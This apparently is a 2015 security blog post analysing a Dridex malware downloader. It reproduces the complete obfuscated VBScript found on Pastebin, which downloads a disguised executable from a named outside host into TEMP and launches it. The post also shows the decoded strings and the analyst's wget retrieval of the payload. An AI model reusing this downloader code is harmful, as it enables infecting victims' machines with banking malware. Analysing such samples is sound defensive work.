Saturday, May 2, 2015

Sneaky Dridex Downloader

On Friday, our sandboxes saw multiple emails with attached malicious documents, each one making a call out to the same Pastebin location, and very little else. Obviously, something was missing here, and this triggered my interest, so I followed up the Pastebin link, and got this:

dim GUIGUiuisu: Set GUIGUiuisu = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) ) 
dim oUIUwefeffffff: Set oUIUwefeffffff = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) ) 
GUIGUiuisu.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(104) & Chr(111) & Chr(115) & Chr(116) & Chr(46) & Chr(97) & Chr(100) & Chr(118) & Chr(105) & Chr(115) & Chr(111) & Chr(114) & Chr(99) & Chr(111) & Chr(110) & Chr(115) & Chr(117) & Chr(108) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(103) & Chr(114) & Chr(111) & Chr(117) & Chr(112) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(105) & Chr(109) & Chr(97) & Chr(103) & Chr(101) & Chr(47) & Chr(105) & Chr(109) & Chr(97) & Chr(103) & Chr(101) & Chr(46) & Chr(112) & Chr(110) & Chr(103) , False 
GUIGUiuisu.Send 
Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) ) 
oOJIGHUGHFff = dfgfderer(Chr(84) & Chr(69) & Chr(77) & Chr(80) ) 
ooOOOOOOf = oOJIGHUGHFff + Chr(92) & Chr(112) & Chr(112) & Chr(112) & Chr(80) & Chr(80) & Chr(79) & Chr(79) & Chr(73) & Chr(118) & Chr(118) & Chr(86) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  
with oUIUwefeffffff 
.type = 1  
.open 
.write GUIGUiuisu.responseBody 
.savetofile ooOOOOOOf, 2  
end with 
Set pPPPPIuhiGUv = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) ) 
pPPPPIuhiGUv.Open ooOOOOOOf

Looks like vb script to me, not very easy to read with the char codes used to obscure the interesting stuff. Let's use a little grep-fu and get a nice csv of those numbers:

77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,65,100,111,100,98,46,83,116,114,101,97,109,71,69,84,104,116,116,112,58,47,47,104,111,115,116,46,97,100,118,105,115,111,114,99,111,110,115,117,108,116,105,110,103,103,114,111,117,112,46,99,111,109,47,105,109,97,103,101,47,105,109,97,103,101,46,112,110,103,87,83,99,114,105,112,116,46,83,104,101,108,108,80,114,111,99,101,115,115,84,69,77,80,92,112,112,112,80,80,79,79,73,118,118,86,46,101,120,101,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110

Which we can then convert, to get:

Microsoft.XMLHTTPAdodb.StreamGEThttp://host.advisorconsultinggroup.com/image/image.pngWScript.ShellProcessTEMP\pppPPOOIvvV.exeShell.Application

Ah ha! There's a URL, and an exe name and location, and a parameter to launch a shell... it should be pretty obvious by now what's going on. Let's get that "png"...

$ wget http://host.advisorconsultinggroup.com/image/image.png
--2015-05-01 14:34:29--  http://host.advisorconsultinggroup.com/image/image.png
Resolving host.advisorconsultinggroup.com (host.advisorconsultinggroup.com)... 91.227.18.80
Connecting to host.advisorconsultinggroup.com (host.advisorconsultinggroup.com)|91.227.18.80|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141824 (138K) [image/png]
Saving to: ‘image.png’

100%[======================================>] 141,824      111KB/s   in 1.2s   

2015-05-01 14:34:35 (111 KB/s) - ‘image.png’ saved [141824/141824]

Rename the png to an exe, just like the vb script would do, and we have our payload:

https://www.virustotal.com/en/file/b979554a3fe3982e2d7fe73c491c4badbf273323eeb611d44bd8cc20c5933e58/analysis/1430491072/

Looks like a Dridex variant, with the detection rate moving up from 3/56 on VT yesterday to 26/56 today.


No comments:

Post a Comment